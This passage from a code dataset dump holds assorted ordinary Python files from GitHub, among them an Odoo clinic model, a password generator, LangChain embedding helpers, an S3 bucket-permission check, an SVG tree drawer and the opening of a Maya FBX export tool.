_sql_constraints = [\n ('unique_patient', 'unique(patient,name)', 'Combination of code and name has been recorded, please check again!'),\n ] #check again\n\n @api.model\n def create(self, vals):\n vals['patient'] = self.env['ir.sequence'].next_by_code('clinic.patient.sequence')\n return super(res_partner, self).create(vals)\n\n @api.multi\n def name_get(self):\n result = []\n for me_id in self:\n result.append((me_id.id, \"%s - %s\" % (me_id.patient, me_id.name)))\n return result\n \n @api.model\n def name_search(self, name, args=None, operator='ilike', limit=100):\n args = args or []\n if name:\n recs = self.search([\n '|',\n ('patient', operator, name),\n ('name', operator, name),\n ] + args, limit=limit)\n else :\n recs = self.search([] + args, limit=limit)\n return recs.name_get()\n\nclass res_partner_doctor(models.Model):\n _name = \"res.partner.doctor\"\n\n doctor = fields.Char(string='Doctor', default='/')\n name = fields.Char(string='Name')\n comment = fields.Text(string='Comment')\n doctor_history = fields.One2many('clinic.checkup', 'doctor_id', 'Doctor History')\n\n _sql_constraints = [\n ('unique_doctor', 'unique(doctor,name)', 'Combination of code and name has been recorded, please check again!'),\n ] #check again\n\n @api.model\n def create(self, vals):\n vals['doctor'] = self.env['ir.sequence'].next_by_code('clinic.doctor.sequence')\n return super(res_partner_doctor, self).create(vals)\n\n @api.multi\n def name_get(self):\n result = []\n for me_id in self:\n result.append((me_id.id, \"%s - %s\" % (me_id.doctor, me_id.name)))\n return result\n \n @api.model\n def name_search(self, name, args=None, operator='ilike', limit=100):\n args = args or []\n if name:\n recs = self.search([\n '|',\n ('doctor', operator, name),\n ('name', operator, name),\n ] + args, limit=limit)\n else :\n recs = self.search([] + args, limit=limit)\n return recs.name_get()","repo_name":"qvinsky/odoo-clinic","sub_path":"models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12618984479","text":"\"\"\" Генератор паролей версия 2.0 \"\"\"\nimport secrets\nimport string\n\ncount = int(input(\"Сколько символов будет содержать пароль? \"))\nsymbols = input(\"Какие символы будут в пароле: \\n\"\n \"1. Только цифры; \\n\"\n \"2. Только буквы в нижнем регистре; \\n\"\n \"3. Только буквы в верхнем регистре; \\n\"\n \"4. Цифры, буквы в верхнем и нижнем регистрах; \\n\"\n \"5. Цифры, буквы и верхнем и нижнем регистрах и знаки препинания. \\n\"\n \"Ваш выбор цифрой: \")\n\nif symbols == \"1\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.digits) for i in range(1, count + 1)))\nelif symbols == \"2\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.ascii_lowercase) for i in range(1, count + 1)))\nelif symbols == \"3\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.ascii_uppercase) for i in range(1, count + 1)))\nelif symbols == \"4\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.digits + string.ascii_lowercase + string.ascii_uppercase) for i in range(1, count + 1)))\nelif symbols == \"5\": print(\"Ваш пароль: \", \"\".join(secrets.choice(string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation) for i in range(1, count + 1)))\nelse: print(\"Выбрано неверное действие\")\n","repo_name":"flippy-root/Python","sub_path":"password_generator_v2.0.py","file_name":"password_generator_v2.0.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1499393316","text":"from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.vectorstores import Chroma\nfrom langchain.document_loaders import TextLoader\nimport pickle\nfrom langchain import OpenAI\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.embeddings import CohereEmbeddings\nimport os\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.chains import ConversationalRetrievalChain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.document_loaders import DirectoryLoader\nfrom langchain.retrievers import ContextualCompressionRetriever\nfrom langchain.retrievers.document_compressors import CohereRerank\nfrom langchain.docstore.document import Document\nimport re\nimport codecs\nfrom bs4 import BeautifulSoup\nimport PyPDF2\n\n#For Loading The documents\n####################################### New Version\n# Create text splitter by paragraphs\n# by empty lines\ndef paragraph_text_splitter(text, source):\n paragraphs = re.split(r'\\.', text)\n paragraphs = [' '.join(paragraphs[i:i+5]) for i in range(0, len(paragraphs), 5)]\n paragraphs = [Document(page_content=par, metadata={\"source\": source}) for par in paragraphs]\n return paragraphs\n\n# For Loading The documents\ndef doc_load(files):\n documents = []\n\n for file in files:\n ext = os.path.splitext(file.name)[1]\n \n if ext.lower() == '.md':\n documents.append(Document(page_content=str(file.read(), encoding='utf-8', errors='ignore'), metadata={\"source\": file.name}))\n \n elif ext.lower() == '.html':\n soup = BeautifulSoup(file, 'html.parser')\n paragraphs = [p.get_text() for p in soup.find_all('p')]\n text = '\\n\\n'.join(paragraphs)\n documents.append(Document(page_content=text, metadata={\"source\": file.name}))\n\n elif ext.lower() == '.pdf':\n pdf_reader = PyPDF2.PdfReader(file)\n text = \"\"\n for page in pdf_reader.pages:\n text += page.extract_text()\n documents.append(Document(page_content=text, metadata={\"source\": file.name}))\n\n # use the text splitter by paragraphs\n splitted = []\n for doc in documents:\n paragraphs = paragraph_text_splitter(doc.page_content, doc.metadata['source'])\n splitted.extend(paragraphs)\n\n return splitted\n##########################################\n\n\n# #For Loading The documents\n# def doc_load(files):\n# documents = []\n\n# for file in files:\n# ext = os.path.splitext(file.name)[1]\n# if ext.lower() in ['.md', '.txt']:\n# documents.append(Document(page_content=str(file.read(), encoding='utf-8', errors='ignore'), metadata={\"source\": file.name}))\n# text_splitter = RecursiveCharacterTextSplitter(chunk_size=1024, chunk_overlap=80)\n# splitted = text_splitter.split_documents(documents)\n# print(splitted)\n# return splitted\n\n#We shall not call embedding function again and again, Instead we shall save our embedding in some pickle file locally\ndef save_embedding_into_pickle(file_path):\n sentence_embedding = SentenceTransformerEmbeddings(model_name=\"all-MiniLM-L6-v2\")\n with open(file_path, 'wb') as f:\n pickle.dump(sentence_embedding, f)\n print('done with saving embeddings into pickle')\n\ndef load_embedding_from_pickle(path):\n with open(path, 'rb') as f:\n embedding = pickle.load(f)\n return embedding\n\n\n#Once User uploads all documents we shall also save chroma using this function\ndef save_chroma_using_embedding(documents,\n embedding_pickle_path,\n vector_path):\n embedding = load_embedding_from_pickle(embedding_pickle_path)\n db = Chroma.from_documents(documents, embedding, persist_directory=vector_path)\n db.persist()\n\n# Once User ask questions we only need to load following function\n\ndef load_chroma_with_query_without_compressor(vector_path,\n embedding_pickle_path,\n query,\n num_of_facts=10):\n embedding = load_embedding_from_pickle(embedding_pickle_path)\n db = Chroma(persist_directory=vector_path, embedding_function=embedding)\n db.get()\n retriever = db.as_retriever(search_kwargs={\"k\": num_of_facts})\n ret_ans = retriever.get_relevant_documents(query)\n unique_docs = [doc for i, doc in enumerate(ret_ans) if doc not in ret_ans[:i]]\n return unique_docs\n\n\ndef load_chroma_with_query_with_compressor(vector_path,\n embedding_pickle_path,\n query,\n api_key,\n num_of_facts=10):\n os.environ[\"COHERE_API_KEY\"]= api_key\n embedding = load_embedding_from_pickle(embedding_pickle_path)\n db = Chroma(persist_directory=vector_path, embedding_function=embedding)\n compressor = CohereRerank()\n db.get()\n retriever = db.as_retriever(search_kwargs={\"k\": num_of_facts})\n compression_retriever = ContextualCompressionRetriever(\n base_compressor=compressor,\n base_retriever=retriever\n )\n ret_ans = compression_retriever.get_relevant_documents(query)\n unique_docs = [doc for i, doc in enumerate(ret_ans) if doc not in ret_ans[:i]]\n return unique_docs","repo_name":"priyansh007/AutoBots","sub_path":"backend/autobot/utils/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"6822437979","text":"#\n# PySNMP MIB module FREEBSD-MIB (http://snmplabs.com/pysmi)\n# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/FREEBSD-MIB\n# Produced by pysmi-0.3.4 at Mon Apr 29 19:02:29 2019\n# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4\n# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) \n#\nOctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols(\"ASN1\", \"OctetString\", \"ObjectIdentifier\", \"Integer\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"ValueSizeConstraint\", \"ValueRangeConstraint\", \"SingleValueConstraint\", \"ConstraintsIntersection\", \"ConstraintsUnion\")\nModuleCompliance, NotificationGroup = mibBuilder.importSymbols(\"SNMPv2-CONF\", \"ModuleCompliance\", \"NotificationGroup\")\nBits, Unsigned32, Counter64, Counter32, IpAddress, MibIdentifier, enterprises, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Integer32, NotificationType, Gauge32, iso, ModuleIdentity = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"Bits\", \"Unsigned32\", \"Counter64\", \"Counter32\", \"IpAddress\", \"MibIdentifier\", \"enterprises\", \"ObjectIdentity\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"TimeTicks\", \"Integer32\", \"NotificationType\", \"Gauge32\", \"iso\", \"ModuleIdentity\")\nDisplayString, TextualConvention = mibBuilder.importSymbols(\"SNMPv2-TC\", \"DisplayString\", \"TextualConvention\")\nfreeBSD = ModuleIdentity((1, 3, 6, 1, 4, 1, 2238))\nfreeBSD.setRevisions(('2006-10-31 08:00',))\nif mibBuilder.loadTexts: freeBSD.setLastUpdated('200610311000Z')\nif mibBuilder.loadTexts: freeBSD.setOrganization('The FreeBSD Project.')\nfreeBSDsrc = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 1))\nif mibBuilder.loadTexts: freeBSDsrc.setStatus('current')\nfreeBSDports = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 2))\nif mibBuilder.loadTexts: freeBSDports.setStatus('current')\nfreeBSDpeople = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 3))\nif mibBuilder.loadTexts: freeBSDpeople.setStatus('current')\nfreeBSDpeoplePhk = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 3, 1))\nif mibBuilder.loadTexts: freeBSDpeoplePhk.setStatus('current')\nfreeBSDVersion = ObjectIdentity((1, 3, 6, 1, 4, 1, 2238, 4))\nif mibBuilder.loadTexts: freeBSDVersion.setStatus('current')\nmibBuilder.exportSymbols(\"FREEBSD-MIB\", freeBSDpeople=freeBSDpeople, freeBSDpeoplePhk=freeBSDpeoplePhk, freeBSDsrc=freeBSDsrc, freeBSDVersion=freeBSDVersion, freeBSD=freeBSD, freeBSDports=freeBSDports, PYSNMP_MODULE_ID=freeBSD)\n","repo_name":"cisco-kusanagi/mibs.snmplabs.com","sub_path":"pysnmp/FREEBSD-MIB.py","file_name":"FREEBSD-MIB.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"6766426798","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n#from credentials import *\nimport boto3\nfrom datetime import datetime, timedelta\n\n\n# init s3 resource and client .\ns3_resource = boto3.resource('s3',\n aws_access_key_id='',\n aws_secret_access_key= '')\n\n\n# init s3 client .\ns3_client = boto3.client('s3',\n aws_access_key_id='',\n aws_secret_access_key= '')\n\n\n\n# loop through s3 buckets and get bucket name\nbucket_name = \"\"\nbucket_object=\"\"\ns3_all= s3_resource.buckets.all()\n\nfor bucket in s3_all:\n print(\"\\nAvailable Bucket is: \", bucket.name )\n bucket_name = bucket.name\n \n\n\n# AccessPermissions\naccess_control_list = s3_client.get_bucket_acl(Bucket=bucket_name)\nprint(\"\\nAccess Permissions List Are :\\n\")\nfor Permission in access_control_list:\n\tprint(Permission)\n \n# Public/Private\n# METHOD 1\nresponse = s3_client.get_public_access_block(Bucket=bucket_name)\nif response['PublicAccessBlockConfiguration']['BlockPublicAcls'] and response['PublicAccessBlockConfiguration']['BlockPublicPolicy'] :\n print(\"Bucket Is Private\")\nelse:\n print(\"Bucket Is Public\")\n\n\n\n\n#s3 = boto3.resource('s3')\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''\nfilename=\"personal-jw\"\n\naccess_control_list_size = s3_client.get_object(Bucket=bucket_name ,key=filename )\nprint(access_control_list_size)\n'''\n\n\n\n\n\n\n\n\n\n# s3_connection = s3_resource\n# bucket_obj = s3_connection.get_bucket(bucket_name)\n# print(bucket_obj)\n\n# s3 = boto.connect_s3()\n# s3 = boto3.resource('s3')\n# the_bucket = s3_resource.Bucket(bucket_name)\n# bucket = s3_client.lookup(bucket_name)\n# total_bytes = 0\n# for key in the_bucket:\n# total_bytes += key.size\n# print(total_bytes)\n# print(dir(the_bucket))\n\n# bucket_size = sum(obj['Size'] for obj in s3_client.list_objects(Bucket=bucket_name))#['Contents']\n# print(bucket_size)\n\n# response = client.list_objects(\n# Bucket=bucket_name,\n# # Marker='moe'\n# )\n# for content in response['Contents']:\n# size = content['Size'] / 1024\n# print(str(size) + \" KB\")\n\n\n\n\n# s3 = boto3.resource('s3')\n# for my_bucket_object in my_bucket.objects.all():\n# print(my_bucket_object)\n\n\n\n\n# bucket = s3_client.Bucket(bucket_name)\n# size = sum(1 for _ in bucket.objects.all())\n# print(size)\n\n# response = s3_client.list_objects(Bucket=bucket_name)#['Contents']\n# bucket_size = sum(obj['Size'] for obj in response)\n# print(bucket_size)\n\n\n########################################################################################################\n# LIBCLOUD\n# client = get_driver(Provider.S3)\n\n# s3 = client(Access_key_ID, Secret_access_key)\n\n# container = s3.get_container(container_name='personal-jw')\n\n# objects = s3.list_container_objects(container)\n\n\n\n# print(container)\n# print(objects.list_objects)\n\n# # print(dir(container))\n# download_to = r\"C:\\Users\\ahmed.mosaad\\Desktop\\py\\automatedsys\"\n# # s3.download_object(objects, download_to)\n\n\n# from libcloud.storage.types import Provider\n# from libcloud.storage.providers import get_driver\n# from my_credentials import *\n\n# # Path to a very large file you want to upload\n# FILE_PATH = r'C:\\Users\\Mos2d\\Downloads\\panda.jpg'\n\n# cls = get_driver(Provider.S3)\n# driver = cls(Access_key_ID, Secret_access_key)\n\n# container = driver.get_container(container_name='my-image-12345')\n\n# # This method blocks until all the parts have been uploaded.\n# extra = {'content_type': 'application/octet-stream'}\n\n# with open(FILE_PATH, 'rb') as iterator:\n# obj = driver.upload_object_via_stream(iterator=iterator,\n# container=container,\n# object_name='backup.jpg',\n# extra=extra)","repo_name":"shakirgad/develop-an-aws-api-using-django","sub_path":"ec2s3/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37764456072","text":"\"\"\"\n\n Drawing module\n\n\"\"\"\nimport os\nfrom io import StringIO\nfrom recursion_tree.node import Node, analyze_nodes\n\n\ndef draw_boundary(node: Node) -> None:\n \"\"\"\n Group boundary\n \"\"\"\n if node.draw_boundary:\n width = node.right - node.left\n height = node.top - node.bottom\n\n opacity = round(((node.depth + 1) * 16) / 255, 3)\n\n left = node.left + Node.origin_x\n top = node.bottom + Node.origin_y\n\n draw('rect', ('fill-opacity', opacity), rx=node.node_bound_radius, x=left,\n y=top, width=width, height=height, fill=node.color_boundary,\n stroke=node.color_boundary_stroke, container=Node.svg)\n\n\ndef draw_node(nodes: list, node_id: int) -> None:\n \"\"\"\n Node body drawing\n \"\"\"\n node = nodes[node_id-1]\n\n left_edge = Node.origin_x + node.x - node.width // 2\n right_edge = Node.origin_x + node.x + node.width // 2\n\n center_x = Node.origin_x + node.x\n center_y = Node.origin_y + node.y\n\n node_x = center_x - node.width // 2\n node_y = center_y - node.height // 2\n\n draw('rect', ('stroke-width', node.node_stroke_width), ('fill-opacity', node.node_opacity),\n x=node_x, y=node_y, width=node.width, rx=node.node_radius, height=node.height,\n fill=node.color_node_body, stroke=node.color_node_stroke, container=Node.svg)\n\n labels = node.text.split('\\n')\n if len(labels) > 1:\n label = f'{labels[0]}'\n for each in labels[1:]:\n label += f'{each}'\n\n draw('line', ('stroke-width', node.node_stroke_width), x1=left_edge, y1=center_y,\n x2=right_edge, y2=center_y, stroke=node.color_node_stroke, container=Node.svg)\n\n text(x=center_x, y=center_y - 7, label=label, fill=node.color_text, container=Node.svg)\n\n else:\n text(x=center_x, y=center_y + 5, label=node.text, fill=node.color_text, container=Node.svg)\n\n\ndef draw_connections(node: Node) -> None:\n \"\"\"\n Draw connection lines with call number\n \"\"\"\n if not node.parent:\n return\n\n start_x = node.parent.x + Node.origin_x\n start_y = node.parent.y + Node.origin_y + node.parent.height // 2\n\n end_x = node.x + Node.origin_x\n end_y = node.y + Node.origin_y - node.height // 2\n\n if node.node_stroke_bezier:\n shift = 100\n m = f\"M{start_x}, {start_y}\"\n c = f\"C{start_x}, {start_y + shift} {end_x}, {end_y - shift} {end_x} {end_y}\"\n d = m + ' ' + c\n draw('path', ('stroke-width', node.node_conn_width), d=d, fill='transparent',\n stroke=node.color_connection, container=Node.svg)\n else:\n draw('line', ('stroke-width', node.node_conn_width), x1=start_x, y1=start_y,\n x2=end_x, y2=end_y, stroke=node.color_connection, container=Node.svg)\n\n if not node.draw_calls:\n return\n\n center_x = (start_x + end_x) // 2\n center_y = (start_y + end_y) // 2\n\n min_rad = node.char_width * len(str(node.node_id)) / 1.8\n radius = max(min_rad, node.node_num_radius)\n\n draw('circle', ('stroke-width', node.node_conn_width), cx=center_x, cy=center_y,\n r=radius, fill=node.color_num_background, stroke=node.color_connection,\n container=Node.svg)\n\n text(x=center_x, y=center_y + 5, fill=node.color_num_text,\n label=node.node_id, container=Node.svg)\n\n\ndef draw(shape, *pairs, container: list = None, **kwargs) -> str:\n \"\"\"\n Abstract drawing function\n \"\"\"\n par_1 = [f'{pair[0]}=\"{pair[1]}\"' for pair in pairs]\n par_2 = [f'{key}=\"{value}\"' for key, value in kwargs.items()]\n result = f'<{shape} ' + ' '.join(par_1 + par_2) + ' />'\n\n if container is not None:\n container.append(result)\n\n return result\n\n\ndef text(label: str, anchor: str = 'middle', container: list = None, **kwargs) -> str:\n \"\"\"\n Add text\n \"\"\"\n par_2 = [f'{key}=\"{value}\"' for key, value in kwargs.items()]\n result = f'{label}'\n\n if container is not None:\n container.append(result)\n\n return result\n\n\ndef draw_tree(func_name: str, nodes: list, settings: dict) -> None:\n \"\"\"\n Main tree drawing\n \"\"\"\n if not nodes:\n return\n\n nodes = analyze_nodes(nodes, settings)\n\n Node.initial_align(nodes, settings)\n root = nodes[0]\n\n width = (root.right - root.left) + settings['margin'] * 2\n height = (root.top - root.bottom) + settings['margin'] * 2 + settings['ver_spacing']\n\n Node.origin_x = abs(root.left) + settings['margin']\n Node.origin_y = abs(nodes[-1].bottom) + settings['margin']\n\n header = f'''\n \n \n '''\n Node.svg.append(header)\n\n draw('rect', x=0, y=0, width=width, height=height,\n fill=settings['color_background'], container=Node.svg)\n\n for node in nodes:\n draw_boundary(node)\n draw_connections(node)\n draw_node(nodes, node.node_id)\n\n Node.svg.append('')\n result = '\\n'.join(Node.svg)\n\n if isinstance(settings['file'], StringIO):\n settings['file'].write(result)\n return\n\n if isinstance(settings['file'], str):\n filename = settings['file'].lower().rstrip('.svg')\n else:\n filename = func_name\n\n i = 1\n while os.path.exists(filename + f'_{i:03d}.svg'):\n i += 1\n\n try:\n with open(filename + f'_{i:03d}.svg', mode='w', encoding='UTF-8') as file:\n file.write(result)\n print(f'New \"{filename}_{i:03d}.svg\" file has been saved.')\n except OSError:\n print(f'Unable to save \"{filename}_{i:03d}.svg\"')\n\n if settings['autostart']:\n try:\n os.startfile(filename + f'_{i:03d}.svg')\n except OSError:\n print(f'Unable to launch \"{filename}_{i:03d}.svg\"')\n","repo_name":"IgorZyktin/recursion_tree","sub_path":"recursion_tree/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"3301496977","text":"import random\r\n\r\n\r\ndef pick_num():\r\n try:\r\n starting_num = int(input(\"Starting Number: \"))\r\n except ValueError:\r\n print(\"Invalid Starting Number -> Provide a Number\")\r\n return False\r\n\r\n try:\r\n ending_num = int(input(\"Ending Number: \"))\r\n except ValueError:\r\n print(\"Invalid Ending Number -> Provide a Number\")\r\n return False\r\n\r\n if not (starting_num < ending_num):\r\n print(\"Starting number isn't smaller than the larger number. Invalid input.\")\r\n return False\r\n\r\n if starting_num == ending_num:\r\n print(\"Starting and ending number are the same. Invalid input.\")\r\n return False\r\n\r\n random_num = random.randint(starting_num, ending_num)\r\n\r\n return random_num\r\n\r\n\r\nwhile True:\r\n num = pick_num()\r\n if num != False:\r\n break\r\n\r\nprint(f\"Random Number: {num}\")","repo_name":"joshuajz/grade12","sub_path":"1.functions/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35200948030","text":"#!/usr/bin/python3\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n # Initial solution using Breath-First Search \n def levelOrder(self, root: TreeNode):\n if root is None:\n return []\n res = []\n def bfs(node):\n q = []\n q.append(node)\n while q:\n size = len(q)\n level = []\n while size > 0:\n temp = q.pop(0)\n level.append(temp.val)\n size -= 1\n if temp.left:\n q.append(temp.left)\n if temp.right:\n q.append(temp.right)\n res.append(level)\n bfs(root) \n return res\n\n # Slightly faster without extra function \n def levelOrder(self, root: TreeNode):\n res = []\n if root is None:\n return res\n q = []\n q.append(root)\n while q:\n size = len(q)\n level = []\n for i in range(size):\n temp = q.pop(0)\n level.append(temp.val)\n if temp.left:\n q.append(temp.left)\n if temp.right:\n q.append(temp.right)\n res.append(level)\n return res","repo_name":"abeleinin/leetcode","sub_path":"neetcode150/medium/102-Binary-Tree-Level-Order-Traversal.py","file_name":"102-Binary-Tree-Level-Order-Traversal.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3622395154","text":"# based on https://github.com/datitran/raccoon_dataset/blob/master/xml_to_csv.py\r\n\r\n# assumes running from TF folder models/research/object_detection\r\n\r\n\r\nimport os\r\nimport glob\r\nimport argparse\r\nimport pandas as pd\r\nimport xml.etree.ElementTree as ET\r\n\r\n\r\ndef xml_to_csv(path):\r\n xml_list = []\r\n for xml_file in glob.glob(path + '/*.xml'):\r\n tree = ET.parse(xml_file)\r\n root = tree.getroot()\r\n for member in root.findall('object'):\r\n value = (root.find('filename').text,\r\n int(root.find('size')[0].text),\r\n int(root.find('size')[1].text),\r\n member[0].text,\r\n int(member[4][0].text),\r\n int(member[4][1].text),\r\n int(member[4][2].text),\r\n int(member[4][3].text)\r\n )\r\n xml_list.append(value)\r\n column_names = ['filename', 'width', 'height',\r\n 'class', 'xmin', 'ymin', 'xmax', 'ymax']\r\n xml_df = pd.DataFrame(xml_list, columns=column_names)\r\n return xml_df\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n '-o', '--outfile', help='Filename for output csv.', required=True)\r\n\r\n parser.add_argument('-f', '--folder',\r\n help='Folder containing images and xml label files (default: current)')\r\n\r\n args = parser.parse_args()\r\n\r\n folder = args.folder\r\n if folder == None:\r\n folder = os.getcwd()\r\n\r\n xml_df = xml_to_csv(folder)\r\n if xml_df.shape[0] > 0:\r\n xml_df.to_csv(args.outfile, index=None)\r\n print('Successfully converted xml to csv.')\r\n else:\r\n print('Nothing to convert.')\r\n\r\n\r\nmain()\r\n","repo_name":"leewilkie/MLUtil","sub_path":"gen_label_csv.py","file_name":"gen_label_csv.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4100574894","text":"# @Author : rookie\n# @Date : 2022/5/25 22:15\n# @file : baseApi.py\n\nimport requests,inspect,sys\n\nfrom study.Study_delivery_system.Utils.handle_yaml import get_yaml_data\nfrom study.Study_delivery_system.conf.public_conf import host\n\n\nclass BaseApi:\n def __init__(self): #初始化方法\n \"\"\"\n 根据子类类名,���取接口的url和请求方式\n \"\"\"\n #__class__.__name__ 获取子类名称\n self.data=get_yaml_data('../conf/apiConfig.yaml')[self.__class__.__name__]\n\n def request_send(self,indata):\n \"\"\"\n 公共请求方法\n :param indata: 请求体\n :return: 调用接口的响应值\n \"\"\"\n funcName=inspect.stack()[1][3]\n path,method=self.data[funcName].values()\n resp=requests.request(method=method,url=f'{host}{path}',data=indata)\n return resp\n\ndef a():\n print('执行函数---a')\n print('谁调用了函数a--->',inspect.stack()[1][3])\n\ndef b():\n print('执行函数---b')\n a()\n print('b函数当前自己的函数名--->',sys._getframe().f_code.co_name)\n\n\n# b()\nif __name__ == '__main__':\n a()","repo_name":"tester-rookie/testgit","sub_path":"study/Study_delivery_system/Common/baseApi.py","file_name":"baseApi.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19634356498","text":"import os\nimport sys\nimport ctypes\nimport ctypes.wintypes\nimport traceback\nimport subprocess\nimport tempfile\n\nimport pymel.core as pm\nimport maya.cmds as cmds\nimport maya.mel as mel\nimport maya.api.OpenMaya as om\n\nfrom mgear.vendor.Qt import QtWidgets, QtCore\n\nfrom mgear.core import (\n pyFBX as pfbx,\n pyqt,\n string,\n utils as coreUtils,\n animLayers,\n)\n# from mgear.shifter.game_tools_fbx import sdk_utils\n\nNO_EXPORT_TAG = \"no_export\"\nWORLD_CONTROL_NAME = \"world_ctl\"\n\nFRAMES_PER_SECOND = {\n \"24 FPS\": (\"film\", 24),\n \"30 FPS\": (\"ntsc\", 30),\n \"60 FPS\": (\"ntscf\", 60),\n \"120 FPS\": (\"120fps\", 120),\n}\nAS_FRAMES = dict(FRAMES_PER_SECOND.values())\nTRANSFORM_ATTRIBUTES = [\n \"tx\",\n \"ty\",\n \"tz\",\n \"rx\",\n \"ry\",\n \"rz\",\n \"sx\",\n \"sy\",\n \"sz\",\n \"visibility\",\n]\n\n\nclass SelectorDialog(QtWidgets.QDialog):\n def __init__(\n self, items=[], title=\"Selector Dialog\", parent=pyqt.maya_main_window()\n ):\n super(SelectorDialog, self).__init__(parent)\n self.title = title\n self.items = items\n self.item = None\n\n self.setWindowTitle(self.title)\n self.setWindowFlags(\n self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint\n )\n\n self.create_widgets()\n self.create_layout()\n self.create_connections()\n\n def create_widgets(self):\n self.list_wgt = QtWidgets.QListWidget()\n for item in self.items:\n self.list_wgt.addItem(item.name())\n\n self.ok_btn = QtWidgets.QPushButton(\"OK\")\n\n def create_layout(self):\n button_layout = QtWidgets.QHBoxLayout()\n button_layout.addStretch()\n button_layout.addWidget(self.ok_btn)\n\n main_layout = QtWidgets.QVBoxLayout(self)\n main_layout.setContentsMargins(2, 2, 2, 2)\n main_layout.setSpacing(2)\n main_layout.addWidget(self.list_wgt)\n main_layout.addStretch()\n main_layout.addLayout(button_layout)\n\n def create_connections(self):\n self.list_wgt.itemClicked.connect(self.get_item)\n self.list_wgt.itemDoubleClicked.connect(self.accept)\n\n self.ok_btn.clicked.connect(self.accept)\n\n def get_item(self, item):\n self.item = item.text()\n\n\ndef export_animation_clip(config_data, clip_data):\n \"\"\"\n Exports a singular animation clip.\n\n config_data: The configuration for the scene/session\n clip_data: Information about the clip to be exported.\n\n :return: return the path of the newly exported fbx.\n :rtype: str\n \"\"\"\n # Clip Data\n start_frame = clip_data.get(\n \"start_frame\", cmds.playbackOptions(query=True, minTime=True)\n )\n end_frame = clip_data.get(\n \"end_frame\", cmds.playbackOptions(query=True, maxTime=True)\n )\n title = clip_data.get(\"title\", \"\")\n frame_rate = clip_data.get(\"geo_root\", coreUtils.get_frame_rate())\n anim_layer = clip_data.get(\"anim_layer\", \"\")\n\n # Config Data\n root_joint = config_data.get(\"joint_root\", \"\")\n file_path = config_data.get(\"file_path\", \"\")\n file_name = config_data.get(\"file_name\", \"\")\n preset_path = config_data.get(\"preset_path\", None)\n up_axis = config_data.get(\n \"up_axis\", cmds.optionVar(query=\"upAxisDirection\")\n )\n file_type = config_data.get(\"file_type\", \"binary\").lower()\n fbx_version = config_data.get(\"fbx_version\", None)\n\n # Validate timeline range\n if start_frame > end_frame:\n msg = \"Start frame {} must be lower than the end frame {}\"\n cmds.error(msg.format(start_frame, end_frame))\n return False\n\n # Validate file path\n if not file_path or not file_name:\n msg = \"No valid file path or file name given for the FBX to export!\"\n cmds.warning(msg)\n return False\n\n if title:\n file_name = \"{}_{}\".format(file_name, title)\n if not file_name.endswith(\".fbx\"):\n file_name = \"{}.fbx\".format(file_name)\n path = string.normalize_path(os.path.join(file_path, file_name))\n print(\"\\t>>> Export Path: {}\".format(path))\n\n auto_key_state = cmds.autoKeyframe(query=True, state=True)\n cycle_check = cmds.cycleCheck(query=True, evaluation=True)\n scene_modified = cmds.file(query=True, modified=True)\n current_frame_range = cmds.currentUnit(query=True, time=True)\n current_frame = cmds.currentTime(query=True)\n 